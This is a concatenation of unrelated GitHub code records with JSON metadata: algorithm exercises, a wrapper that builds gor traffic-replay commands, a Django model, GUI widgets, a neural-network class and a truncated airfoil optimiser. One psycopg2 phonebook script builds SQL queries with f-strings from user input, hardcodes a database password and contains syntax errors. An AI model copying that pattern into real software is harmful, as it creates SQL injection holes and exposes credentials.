first_half_end = self.end_of_first_half(head)\n second_half_start = self.reverse(first_half_end.next)\n\n first_node = head\n second_node = second_half_start\n while second_node is not None:\n if first_node.val != second_node.val:\n return False\n first_node = first_node.next\n second_node = second_node.next\n\n return True\n\n def end_of_first_half(self, head):\n slow = head\n fast = head\n while fast.next is not None and fast.next.next is not None:\n fast = fast.next.next\n slow = slow.next\n return slow\n\n def reverse(self, head):\n prev_node = None\n curr_node = head\n while curr_node is not None:\n next_node = curr_node.next\n curr_node.next = prev_node\n prev_node = curr_node\n curr_node = next_node\n return prev_node\n\n\n# O(N) and O(1)","repo_name":"Jay4869/Data-Science","sub_path":"Leetcode/234. Palindrome Linked List.py","file_name":"234. Palindrome Linked List.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"38667007471","text":"def solution(name):\n answer = 0\n name = list(name)\n Al1 = \"ABCDEFGHIJKLMN\"\n Al2 = \"AZYXWVUTSRQPO\"\n AA = \"A\" * len(name)\n\n for i in name:\n if i in Al1:\n answer += Al1.index(i)\n else:\n answer += Al2.index(i)\n ind = 0\n\n while True :\n name[ind] = \"A\"\n if name == list(AA):\n break\n a , b = 1 , 1\n while name[ind - a] == \"A\":\n a += 1\n while name[ind + b] == \"A\":\n b += 1\n answer += min(a,b)\n ind += -a if a 0:\n return [\"--input-tcp\", (\":%d\" % self.configuration.input.port)]\n raise GorCommandException(\"TCP port %s has to be greater than 0\" % self.configuration.input.port)\n return []\n\n def _input_raw(self):\n if InputType.RAW == self.configuration.input.type:\n if self.configuration.input.port > 0:\n return [\"--input-raw\", (\":%d\" % self.configuration.input.port)]\n raise GorCommandException(\"RAW port %s has to be greater than 0\" % self.configuration.input.port)\n return []\n\n def _append_rate(self, host, global_rate):\n if host.get(\"rate\", None):\n return '\"%s|%s\"' % (host[\"host\"], host[\"rate\"])\n elif global_rate:\n return '\"%s|%s\"' % (host[\"host\"], global_rate)\n return '\"%s\"' % host[\"host\"]\n\n def _output_tcp(self, host):\n host_port = host[\"host\"].split(\":\")\n if len(host_port) < 2:\n hostname = host[\"host\"]\n else:\n hostname = host_port[0]\n\n if Validator.is_hostname(hostname):\n return [\"--output-tcp\", self._append_rate(host, self.configuration.output.tcp.rate)]\n raise GorCommandException(\"Output's TCP host %s has incorrect format\" % host[\"host\"])\n\n def _output_tcps(self):\n if not self.configuration.output.tcp:\n return []\n\n target_hosts = self.configuration.output.tcp.hosts\n if len(target_hosts) == 0:\n raise GorCommandException(\"List of output's TCP hosts is empty\")\n\n output_tcps = []\n for target_host in target_hosts:\n output_tcps += self._output_tcp(target_host)\n return output_tcps\n\n def _output_http(self, host):\n if Validator.is_url(host[\"host\"]):\n return [\"--output-http\", self._append_rate(host, self.configuration.output.http.rate)]\n raise GorCommandException(\"Output's HTTP host %s has incorrect format\" % host[\"host\"])\n\n def _output_https(self):\n if not self.configuration.output.http:\n return []\n\n target_hosts = self.configuration.output.http.hosts\n if len(target_hosts) == 0:\n raise GorCommandException(\"List of output's HTTP hosts is empty\")\n\n output_https = []\n for target_host in target_hosts:\n output_https += self._output_http(target_host)\n return output_https\n\n def _output_stdout(self):\n if self.configuration.output.stdout:\n return [\"--output-stdout\", \"true\"]\n return []\n\n def _exit_after(self):\n if self.configuration.finish_after:\n return [\"--exit-after\", self.configuration.finish_after]\n return []\n\n def _split_output(self):\n if self.configuration.output.split_traffic:\n return [\"--split-output\", \"true\"]\n return []\n\n def _http_allow_url(self, path):\n if Validator.is_url_path(path):\n return [\"--http-allow-url\", '\"%s\"' % path]\n raise GorCommandException(\"Allow path %s has incorrect format\" % path)\n\n def _http_allow_urls(self):\n if not self.configuration.input.paths:\n return []\n\n allow_urls = [self._http_allow_url(path) for path in self.configuration.input.paths.allow]\n return flat_array(allow_urls)\n\n def _http_disallow_url(self, path):\n if Validator.is_url_path(path):\n return [\"--http-disallow-url\", '\"%s\"' % path]\n raise GorCommandException(\"Disallow path %s has incorrect format\" % path)\n\n def _http_disallow_urls(self):\n if not self.configuration.input.paths:\n return []\n\n disallow_urls = [self._http_disallow_url(path) for path in self.configuration.input.paths.disallow]\n return flat_array(disallow_urls)\n\n def _http_rewrite_url(self, rewrite_path):\n if Validator.is_rewrite_path(rewrite_path):\n return [\"--http-rewrite-url\", '\"%s\"' % rewrite_path]\n raise GorCommandException(\"Rewrite path %s has incorrect format. Expects ':' as a delimiter.\" % rewrite_path)\n\n def _http_rewrite_urls(self):\n if not self.configuration.input.paths:\n return []\n\n rewrite_urls = [self._http_rewrite_url(path) for path in self.configuration.input.paths.rewrite]\n return flat_array(rewrite_urls)\n\n def _output_http_workers(self):\n # (Average number of requests per second)/(Average target response time per second)\n if self.configuration.output.http.workers >= 1:\n return [\"--output-http-workers\", str(self.configuration.output.http.workers)]\n return []\n\n def _extra_args(self):\n if self.configuration.extra_args:\n extra_args = [[key, '\"%s\"' % value] for key, value in self.configuration.extra_args.items()]\n return flat_array(extra_args)\n return []\n\n def _gor(self):\n if os.path.exists(self.gor_path):\n return [self.gor_path]\n raise GorCommandException(\"Not found 'gor' application in path: %s\" % self.gor_path)\n\n def build(self):\n args = []\n\n if self.as_root:\n args += [\"sudo\"]\n\n args += self._gor()\n\n if self.configuration:\n args += self._input_raw()\n args += self._input_tcp()\n\n args += self._http_allow_urls()\n args += self._http_disallow_urls()\n args += self._http_rewrite_urls()\n\n args += self._output_https()\n args += self._output_http_workers()\n args += self._output_tcps()\n\n args += self._split_output()\n args += self._output_stdout()\n\n args += self._exit_after()\n args += self._extra_args()\n\n return args\n\n def build_string(self):\n return \" \".join(self.build())\n\n\nif __name__ == '__main__':\n conf = ConfigurationReader.read(\"example_cloner_service_in.json\")\n command = GorCommand(conf).build_string()\n print(command)\n","repo_name":"banan1988/python","sub_path":"cloner_v2/gor.py","file_name":"gor.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11016077826","text":"def reverseWords(s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n\n def reverseword(word):\n new_list = []\n for each in word:\n new_list.insert(0, each)\n return ''.join(new_list)\n\n word_list = s.split(\" \")\n new_word_list = []\n for each in word_list:\n new_word_list.append(reverseword(each))\n\n return ' '.join(new_word_list)\n\n\n\nprint(reverseWords(\"hello nihao\"))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"reverseWord.py","file_name":"reverseWord.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42105061502","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom languages.fields import LanguageField\n\n\nclass MyUser(AbstractUser):\n\n display_name = models.CharField(\n max_length=50,\n null=True,\n blank=True\n )\n\n email = models.EmailField(\n verbose_name=\"Email Address\",\n max_length=255,\n unique=True\n )\n\n language = LanguageField(\n max_length=8,\n blank=True,\n default=\"eng\"\n )\n\n bio = models.TextField(\n null=True,\n blank=True,\n help_text=\"A little about yourself. Do you like cheese, for instance?\"\n )\n\n avatar = models.ImageField()\n\n is_online = models.BooleanField(\n default=False\n )\n\n is_active = models.BooleanField(\n default=True\n )\n\n is_admin = models.BooleanField(\n default=False\n )\n","repo_name":"knmarvel/djangochannels","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27749123297","text":"import psycopg2\r\n\r\nhostname = 'localhost'\r\ndatabase = 'postgres'\r\nusername = 'postgres'\r\npwd = 'qwerty'\r\nport_id = 5432\r\n\r\nconn = None\r\ncur = None\r\n\r\nsql = 'select * from phone'\r\n\r\n# in the block try we will write request to tables\r\n\r\ntry:\r\n # connect to exist database\r\n\r\n conn = psycopg2.connect(\r\n host = hostname,\r\n dbname = database,\r\n user = username,\r\n password = pwd,\r\n port = port_id)\r\n cur = conn.cursor()\r\n \r\n # the cursor for perfoming database operations\r\n \r\n # create a new table\r\n cur.execute('DROP TABLE IF EXISTS phone')\r\n\r\n create_script = '''CREATE TABLE IF NOT EXISTS phone(\r\n id int\r\n name varchar(40) NOT NULL,\r\n number int)'''\r\n cur.execute(create_script)\r\n \r\n\r\n \r\n # insert data into a table\r\n insert_script = '''INSERT INTO phone (id, name, number) VALUES(%s, %s, %s)''' #2 %s folders for 2 column\r\n insert_values = [(1,'James', 880055) , (2,'Rob', 87764), (3,'Mary', 756)]\r\n for record in insert_values:\r\n cur.execute(insert_script, record)\r\n\r\n print(\"Record by pattern\")\r\n variant = input()\r\n if variant == \"y\":\r\n pattern = input(\"Enter pattern... \")\r\n search = input(\"Search in... \")\r\n '''if search == \"name\":\r\n search_sql = f\"select (user_id, username, numbers) from phone where \\\"username\\\" like '%{pattern}%';\"\r\n cur.execute(search_sql)\r\n if search == \"number\":\r\n number = input(\"Enter number...\")\r\n search_sql = f\"select (user_id, username, numbers) from phone where where \\\"numbers\\\" like '%{pattern}%';\"'''\r\n \r\n search_sql = f\"select * from phone where \\\"{search}\\\" like '%{pattern}%';\"\r\n cur.execute(search_sql)\r\n str_search = cur.fetchall()\r\n print(str_search)\r\n \r\n\r\n print(\"Do you want add new user\")\r\n variant = input()\r\n if variant == \"y\":\r\n id = input(\"Enter id... \")\r\n name = input(\"Enter name... \")\r\n number = input(\"Enter phone number...\")\r\n cur.execute(f\"select * from from phonebook where \\\"username\\\" like '%{pattern}%';\")\r\n print(len(cur.fetchall()))\r\n if len(cur.fetchall()) > 0 :\r\n cur.execute(f\"update phonebook set \\\"username\\\" = '{name}' where \\\"user_id\\\" = '{id}';\")\r\n cur.execute(f\"update phonebook set \\\"numbers\\\" = '{name}' where \\\"user_id\\\" = '{id}';\")\r\n else:\r\n cur.execute(f\"insert into phonebook (user_id, username, numbers) values ({id}, '{name}', {number});\")\r\n \r\n \r\nexcept Exception as error:\r\n print(error)\r\n\r\nfinally:\r\n if conn is not None:\r\n conn.close()\r\n if cur is not None:\r\n cur.close()\r\n","repo_name":"AriRangmad/pp2-20B030116","sub_path":"2att/sis11/sis11_newuser.py","file_name":"sis11_newuser.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72663213208","text":"# 여러 지역 날씨를 검색 후 캡처 저장하는 코드\n\nimport pyautogui\nimport time\nimport pyperclip\n\nweather = ['서울 날씨', '시흥 날씨', '청주 날씨', '부산 날씨', '강원도 날씨']\n\naddr_x = 1377 \naddr_y = 296\nstart_x = 1005 \nstart_y = 317\nend_x = 1830\nend_y = 817\n\nfor region_weather in weather:\n pyautogui.moveTo(addr_x, addr_y, 1)\n time.sleep(0.2)\n pyautogui.click()\n time.sleep(0.2)\n pyautogui.write('www.naver.com', interval=0.1)\n pyautogui.write(['enter'])\n time.sleep(1)\n \n pyperclip.copy(region_weather)\n pyautogui.hotkey('ctrl', 'v')\n time.sleep(0.5)\n pyautogui.write(['enter'])\n time.sleep(1.0)\n path = f'project\\{int(10)}.automouse\\{region_weather}.png' \n pyautogui.screenshot(path, region=(start_x, start_y, end_x-start_x, end_y-start_y))\n","repo_name":"AlexMJY/project_with_python","sub_path":"project/automouse_webpage/main10-4.py","file_name":"main10-4.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14123980175","text":"import tkinter\r\nimport random\r\nfrom typing import Optional, Callable, Union\r\n\r\nimport customtkinter\r\n\r\nfrom utils import gui as gui_utils\r\n\r\n\r\nclass FloatSpinbox(customtkinter.CTkFrame):\r\n def __init__(\r\n self,\r\n *args,\r\n start_index: int = 1,\r\n max_value: Union[int] = 100,\r\n width: int = 100,\r\n height: int = 32,\r\n step_size: Union[int, float] = 1,\r\n command: Callable = None,\r\n **kwargs\r\n ):\r\n super().__init__(*args, width=width, height=height, **kwargs)\r\n\r\n self.step_size = int(step_size)\r\n self.max_value = int(max_value)\r\n self.command = command\r\n\r\n self.configure(fg_color=(\"gray78\", \"gray21\"))\r\n\r\n self.grid_columnconfigure((0, 2), weight=0)\r\n self.grid_columnconfigure(1, weight=1)\r\n\r\n self.subtract_button = customtkinter.CTkButton(self, text=\"-\", width=height-6, height=height-6,\r\n command=self.subtract_button_callback)\r\n self.subtract_button.grid(row=0, column=0, padx=(3, 0), pady=3)\r\n\r\n self.entry = customtkinter.CTkEntry(self, width=width-(2*height), height=height-6, border_width=0, fg_color=\"gray16\")\r\n self.entry.grid(row=0, column=1, columnspan=1, padx=3, pady=3, sticky=\"ew\")\r\n\r\n self.add_button = customtkinter.CTkButton(self, text=\"+\", width=height-6, height=height-6,\r\n command=self.add_button_callback)\r\n self.add_button.grid(row=0, column=2, padx=(0, 3), pady=3)\r\n\r\n self.entry.insert(0, start_index)\r\n\r\n def add_button_callback(self):\r\n if self.command is not None:\r\n self.command()\r\n try:\r\n value = int(self.entry.get()) + self.step_size\r\n if value > self.max_value:\r\n value = self.max_value\r\n self.entry.delete(0, \"end\")\r\n self.entry.insert(0, value)\r\n except ValueError:\r\n return\r\n\r\n def subtract_button_callback(self):\r\n if self.command is not None:\r\n self.command()\r\n try:\r\n value = int(self.entry.get()) - self.step_size\r\n if value < 1:\r\n value = 1\r\n self.entry.delete(0, \"end\")\r\n self.entry.insert(0, value)\r\n except ValueError:\r\n return\r\n\r\n def get(self) -> Union[float, None]:\r\n try:\r\n return float(self.entry.get())\r\n except ValueError:\r\n return None\r\n\r\n def set(self, value: float):\r\n self.entry.delete(0, \"end\")\r\n self.entry.insert(0, str(int(value)))\r\n\r\n\r\nclass CTkEntryWithLabel(customtkinter.CTkFrame):\r\n \"\"\"\r\n Entry with a label\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n master,\r\n label_text: str,\r\n\r\n textvariable: Optional[Union[tkinter.StringVar, tkinter.Variable]] = None,\r\n\r\n on_text_changed: Optional[Callable] = None,\r\n on_focus_in: Optional[Callable] = None,\r\n on_focus_out: Optional[Callable] = None,\r\n\r\n width: int = 140,\r\n height: int = 28,\r\n\r\n state: str = tkinter.NORMAL,\r\n\r\n hide_on_focus_out: bool = False,\r\n **kwargs\r\n ):\r\n super().__init__(master, fg_color=\"transparent\")\r\n\r\n self.on_text_changed = on_text_changed if on_text_changed is not None else lambda: None\r\n self.on_focus_in = on_focus_in if on_focus_in is not None else lambda: None\r\n self.on_focus_out = on_focus_out if on_focus_out is not None else lambda: None\r\n\r\n self.label = customtkinter.CTkLabel(\r\n self,\r\n text=label_text,\r\n )\r\n self.label.grid(row=0, column=0, padx=0, pady=0, sticky=\"w\")\r\n\r\n self.entry = customtkinter.CTkEntry(\r\n self,\r\n state=state,\r\n textvariable=textvariable,\r\n width=width,\r\n height=height,\r\n\r\n **kwargs\r\n )\r\n\r\n if state == tkinter.DISABLED:\r\n self.entry.configure(fg_color=\"gray25\", border_color=\"gray25\")\r\n\r\n self.entry.grid(row=1, column=0, padx=0, pady=0, sticky=\"w\")\r\n self.entry.bind(\"\", self.text_changed)\r\n\r\n self.text = textvariable.get().strip() if isinstance(textvariable, tkinter.StringVar) else \"\"\r\n self.is_shortened = False\r\n if hide_on_focus_out:\r\n shortened_string = gui_utils.shorten_long_string(self.text)\r\n self.entry.configure(textvariable=tkinter.StringVar(value=shortened_string))\r\n self.is_shortened = True\r\n\r\n self.entry.bind(\"\", self.focus_in)\r\n self.entry.bind(\"\", self.focus_out)\r\n\r\n def get(self):\r\n return self.entry.get().strip()\r\n\r\n def bind(self, sequence, command, add=True):\r\n self.entry.bind(sequence, command, add)\r\n\r\n def show_full_text(self):\r\n self.entry.configure(textvariable=tkinter.StringVar(value=self.text))\r\n self.is_shortened = False\r\n\r\n def hide_full_text(self):\r\n text = gui_utils.shorten_long_string(self.text)\r\n self.entry.configure(textvariable=tkinter.StringVar(value=text))\r\n self.is_shortened = True\r\n\r\n def text_changed(self, event):\r\n self.text = self.entry.get().strip()\r\n\r\n self.on_text_changed()\r\n\r\n def focus_in(self, event):\r\n self.on_focus_in()\r\n\r\n self.show_full_text()\r\n\r\n def focus_out(self, event):\r\n self.on_focus_out()\r\n\r\n self.hide_full_text()\r\n\r\n def set_text_changed_callback(self, callback: Callable):\r\n self.entry.bind(\"\", lambda event: callback())\r\n\r\n def set_click_callback(self, callback: Callable):\r\n self.entry.bind(\"\", lambda event: callback())\r\n\r\n def set_focus_in_callback(self, callback: Callable):\r\n self.on_focus_in = callback\r\n\r\n def set_focus_out_callback(self, callback: Callable):\r\n self.on_focus_out = callback\r\n\r\n\r\nclass CTkCustomTextBox(customtkinter.CTkTextbox):\r\n def __init__(\r\n self,\r\n master,\r\n grid: dict,\r\n text: str,\r\n height: int = 100,\r\n font: tuple = (\"Consolas\", 14),\r\n ):\r\n super().__init__(master=master, font=font, fg_color='gray14')\r\n self.configure(height=height)\r\n self.grid(**grid)\r\n self.insert(\"1.0\", text)\r\n\r\n\r\nclass ComboWithRandomCheckBox:\r\n def __init__(\r\n self,\r\n master,\r\n grid: dict,\r\n options: list,\r\n text: str = \"Random\",\r\n combo_command: Optional[Callable] = lambda _: None,\r\n ):\r\n self.options = options\r\n\r\n self.combobox = customtkinter.CTkComboBox(\r\n master=master,\r\n values=options,\r\n width=130,\r\n command=combo_command\r\n )\r\n self.combobox.grid(**grid)\r\n\r\n self.random_checkbox = customtkinter.CTkCheckBox(\r\n master=master,\r\n text=text,\r\n checkbox_width=18,\r\n checkbox_height=18,\r\n onvalue=True,\r\n offvalue=False,\r\n command=self.random_checkbox_event,\r\n )\r\n self.random_checkbox.grid(row=grid[\"row\"] + 1, column=grid[\"column\"], padx=20, pady=5, sticky=\"w\")\r\n\r\n def random_checkbox_event(self):\r\n if self.random_checkbox.get():\r\n self.combobox.configure(\r\n state=\"disabled\",\r\n fg_color='#3f3f3f',\r\n )\r\n else:\r\n self.combobox.configure(\r\n state=\"normal\",\r\n fg_color='#343638',\r\n )\r\n\r\n def get_value(self):\r\n if self.random_checkbox.get():\r\n return random.choice(self.options)\r\n return self.combobox.get()\r\n\r\n def get_checkbox_value(self):\r\n return self.random_checkbox.get()\r\n\r\n def set_values(self, combo_value: str):\r\n\r\n if combo_value.lower() == 'random':\r\n self.combobox.configure(\r\n state=\"disabled\",\r\n fg_color='#3f3f3f',\r\n )\r\n self.random_checkbox.select()\r\n else:\r\n self.combobox.configure(\r\n state=\"normal\",\r\n fg_color='#343638',\r\n )\r\n self.combobox.set(combo_value)\r\n self.random_checkbox.deselect()\r\n","repo_name":"frankmurrey/starknet_drop_helper","sub_path":"gui/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":8423,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"31"} +{"seq_id":"35131387137","text":"import copy\nclass NeuralNetwork:\n\n def __init__(self,a):\n self.optimizer = a\n self.loss = []\n self.layers = []\n self.data_layer = None\n self.loss_layer = None\n self.input =None\n\n def forward(self):\n\n self.input = self.data_layer.forward()\n output = self.layers[0].forward(self.input[0])\n for i in range(len(self.layers)-1):\n output = self.layers[i+1].forward(output)\n\n loss = self.loss_layer.forward(output, self.input[1])\n\n return loss\n\n def backward(self):\n\n #loss = self.loss_layer.forward(output, self.data_layer.forward()[1])\n e = self.loss_layer.backward(self.input[1])\n for i in range(len(self.layers)):\n e = self.layers[len(self.layers)-i-1].backward(e)\n\n return e\n\n def append_trainable_layer(self,layer):\n layer.optimizer = copy.deepcopy(self.optimizer)\n self.layers.append(layer)\n\n\n\n def train(self,iterations):\n for i in range(iterations):\n self.loss.append(self.forward())\n self.backward()\n\n def test(self,input_tensor):\n\n output_test = self.layers[0].forward(input_tensor)\n for i in range(len(self.layers) - 1):\n output_test = self.layers[i + 1].forward(output_test)\n\n return output_test\n\n\n","repo_name":"fourier28/Deep-Learning","sub_path":"ex2/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2348069308","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\n## 첫번째 방법 - ![시간초과]!\r\n###가지고 있는 숫자카드 입력\r\n##num_get = int(input())\r\n##getN = list(map(int,input().split()))\r\n## \r\n###제시된 숫자카드 입력\r\n##num_sug = int(input())\r\n##sugN = list(map(int,input().split()))\r\n##\r\n##result = []\r\n##for n in sugN:\r\n## if n in getN:\r\n## result.append(1)\r\n## else:\r\n## result.append(0)\r\n##\r\n###출력\r\n##for n in result:\r\n## print(n, end=' ')\r\n\r\n#두번째 방법\r\nplus_n = [0]*(10**7) + [0]\r\nminus_n = [0]*(10**7) + [0]\r\n\r\nnum_get = int(input())\r\ngetN = list(map(int,input().split()))\r\nfor n in getN:\r\n if n>=0:\r\n plus_n[n] = 1\r\n else:\r\n minus_n[-n] = 1\r\n \r\n\r\nnum_sug = int(input())\r\nsugN = list(map(int,input().split()))\r\n\r\nresult = []\r\nfor n in sugN:\r\n if n>=0:\r\n result.append(plus_n[n])\r\n else:\r\n result.append(minus_n[-n])\r\n\r\n#출력\r\nfor n in result:\r\n print(n, end=' ')\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"Lee-seung-won/elegance_Baekjoon","sub_path":"10815.py","file_name":"10815.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24372812834","text":"import random\nfrom math import factorial\nimport math\n\nimport numpy\n#import pymop.factory\n\n#ディープ\nfrom deap import algorithms\nfrom deap import base\n#from deap.benchmarks.tools import igd\nfrom deap import creator\nfrom deap import tools\n\n#プロット\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D # 3Dグラフ作成のため\n\n#id取得\nimport os\n\nimport sys\nimport traceback\n\n#並列処理\nfrom multiprocessing import Pool,Value\n\n#自作モジュール\nimport foilConductor as fc\nimport XfoilAnalize as xa\n\ndef decoder(individual,code_division):\n #遺伝子を混合比にデコード\n ratios = []\n for i in range(0,len(individual),code_division):\n ratio = 0\n for j in range(code_division):\n ratio += individual[i+j]\n ratios.append(ratio)\n return ratios\n\n#=====================================================\n#親翼型の選択\n#=====================================================\nobj1_max = 1\nobj2_max = 1\nobj3_max = 1\nfoil_path = 'foils/'\ndatfiles = ['AG24.dat','AG14.dat','AG16','AG38.dat','SD8040 (10%).dat','SD7084 (9.6%).dat','SD7037.dat']\n#---------------------------------------\n#フィルにパスをつなぐ\nfor i in range(len(datfiles)):\n datfiles[i] = foil_path + datfiles[i]\n#---------------------------------------\n\n#=====================================================\n#最適化の定義\n#=====================================================\nNOBJ = 3#評価関数の数\n#K = 10\ncode_division = 6#混合比率をコードにする際の分解数\nNDIM = len(datfiles)*code_division#遺伝子数=親翼型の数×比率の分解能\nP = 12\nH = factorial(NOBJ + P - 1) / (factorial(P) * factorial(NOBJ - 1))\nBOUND_LOW, BOUND_UP = -5.0/code_division, 5.0/code_division#遺伝子定義域\n#problem = pymop.factory.get_problem(PROBLEM, n_var=NDIM, n_obj=NOBJ)#ベンチマーク\n\nMU = 400#人口の数#int(H + (4 - H % 4))\n#print(MU)\nNGEN = 200#世代数\nCXPB = 1.0#交叉の確立(1を100%とする)\nMUTPB = 1.0#突然変異の確立(1を100%とする)\n\n# Create uniform reference point\nref_points = tools.uniform_reference_points(NOBJ, P)\n\n# Create classes\ncreator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,) * NOBJ)\ncreator.create(\"Individual\", list, fitness=creator.FitnessMin)\n##\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#評価関数の定義\n#(いじるのは基本この中)\ndef evaluate(individual):\n global code_division\n ratios = decoder(individual, code_division)\n #===========================================\n #翼型を混合し、新翼型のdatファイルを書き出す\n #==========================================\n datlist_list = [fc.read_datfile(file) for file in datfiles]\n datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n newdat = fc.interpolate_dat(datlist_shaped_list,ratios)\n #foilpara == [最大翼厚、最大翼厚位置、最大キャンバ、最大キャンバ位置、S字の強さ]\n foil_para = fc.get_foil_para(newdat)\n\n mt, mta, mc, mca, s = foil_para\n #print(obj1_max,obj2_max,obj3_max)\n #--------------------\n #翼の形に関する拘束条件\n penalty = 0\n print('===================')\n if(mc<0):\n print(\"out of the border\")\n print(\"reverse_cmaber\")\n penalty -= mc\n if(mt<0.08):\n print(\"out of the border\")\n print(\"too_thin\")\n penalty += 0.08-mt\n if(mt>0.11):\n print(\"out of the border\")\n print(\"too_fat\")\n penalty += mt-0.11\n #if(foil_para[4]>0.03):\n # print(\"out of the border\")\n # print(\"peacock\")\n # print('===================')\n # return (1.0+(foil_para[4]-0.03),)*NOBJ\n if(mta<0.23):\n print(\"out of the border\")\n print(\"Atama Dekkachi!\")\n penalty += 0.23 - mta\n if(mta>0.3):\n print(\"out of the border\")\n print(\"Oshiri Dekkachi!\")\n penalty += mta - 0.3\n\n if penalty > 0:\n return [1.0 + penalty]*NOBJ\n #--------------------\n id = str(os.getpid())\n dir_path = 'dump'\n try:\n os.makedirs(dir_path)\n except FileExistsError:\n pass\n newfile_name = 'newfoil' + id + '.dat'\n foilfile = fc.write_datfile(datlist=newdat,newfile_name = dir_path + '/' + newfile_name)\n\n #==========================================\n #新翼型の解析\n #==========================================\n set1 = xa.XfoilAnalize(cseq=[0.4,1.1,0.1],foilfile=foilfile,polar=\"polar1\" + id)\n #set2 = xa.XfoilAnalize(foilfile=newfile_name,polar=\"polar2\" + id,Re=150000,cl=0.5)\n #set3 = xa.XfoilAnalize(foilfile=newfile_name,polar=\"polar3\" + id,Re=100000,cl=0.5)\n\n try:\n Lrlist = set1.Cseq(timeout=9)[\"Lrlist\"]\n maxLr = max(Lrlist)\n maxindex = Lrlist.index(maxLr)\n\n #==========================================\n #目的値\n #==========================================\n obj1 = 1/Lrlist[0]#揚抗比の最大化\n obj2 = abs(Lrlist[maxindex] - Lrlist[maxindex+1])#揚抗比のピークを滑らかに(安定性の最大化)\n obj3 = foil_para[4]#下面の反りを最小化(製作再現性の最大化)#abs(set2.OneCL()[\"Alpha\"]-set3.OneCL()[\"Alpha\"])\n\n #正規化\n obj1 = obj1 if obj1<=1 else 1.0#値域<1.0\n obj2 = obj2 if obj2<=1 else 1.0#値域<1.0\n obj3 = obj3 if obj3<=1 else 1.0#値域<1.0\n\n print(\"individual\",individual)\n print(\"evaluate\",obj1,obj2,obj3)\n print(\"max_thickness\",foil_para[0])\n print(\"at\",foil_para[1])\n print(\"max_camber\",foil_para[2])\n print(\"at\",foil_para[3])\n print(\"S\",foil_para[4])\n print('===================')\n except Exception as e:\n obj1,obj2,obj3=[1.0]*NOBJ\n traceback.print_exc()\n print(\"individual\",individual)\n print(\"evaluate\",obj1,obj2,obj3)\n print(\"max_thickness\",foil_para[0])\n print(\"at\",foil_para[1])\n print(\"max_camber\",foil_para[2])\n print(\"at\",foil_para[3])\n print(\"S\",foil_para[4])\n print('===================')\n\n return [obj1,obj2,obj3]\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Toolbox initialization\ndef uniform(low, up, size=None):\n try:\n return [random.uniform(a, b) for a, b in zip(low, up)]\n except TypeError:\n return [random.uniform(a, b) for a, b in zip([low] * size, [up] * size)]\n##\ntoolbox = base.Toolbox()\ntoolbox.register(\"attr_float\", uniform, BOUND_LOW, BOUND_UP, NDIM)\ntoolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.attr_float)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\ntoolbox.register(\"evaluate\",evaluate)\ntoolbox.register(\"mate\", tools.cxSimulatedBinaryBounded, low=BOUND_LOW, up=BOUND_UP, eta=30.0)\ntoolbox.register(\"mutate\", tools.mutPolynomialBounded, low=BOUND_LOW, up=BOUND_UP, eta=20.0, indpb=1.0/NDIM)\ntoolbox.register(\"select\", tools.selNSGA3, ref_points=ref_points)\n\ndef main(seed=None):\n global obj1_max,obj2_max,obj3_max, CXPB, MUTPB\n pool = Pool(4)#同時並列数(空白にすると最大数になる)\n toolbox.register(\"map\", pool.map)\n\n random.seed(seed)\n\n # Initialize statistics object\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", numpy.mean, axis=0)\n stats.register(\"std\", numpy.std, axis=0)\n stats.register(\"min\", numpy.min, axis=0)\n stats.register(\"max\", numpy.max, axis=0)\n\n logbook = tools.Logbook()\n logbook.header = \"gen\", \"evals\", \"std\", \"min\", \"avg\", \"max\"\n\n pop = toolbox.population(n=MU)\n\n #0世代目の評価\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in pop if not ind.fitness.valid]\n fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n #0世代目の統計\n # Compile statistics about the population\n record = stats.compile(pop)\n logbook.record(gen=0, evals=len(invalid_ind), **record)\n print(logbook.stream)\n\n #描画準備\n plt.ion()\n\n #進化の始まり\n # Begin the generational process\n for gen in range(1, NGEN):\n offspring = algorithms.varAnd(pop, toolbox, CXPB, MUTPB)\n #評価\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n 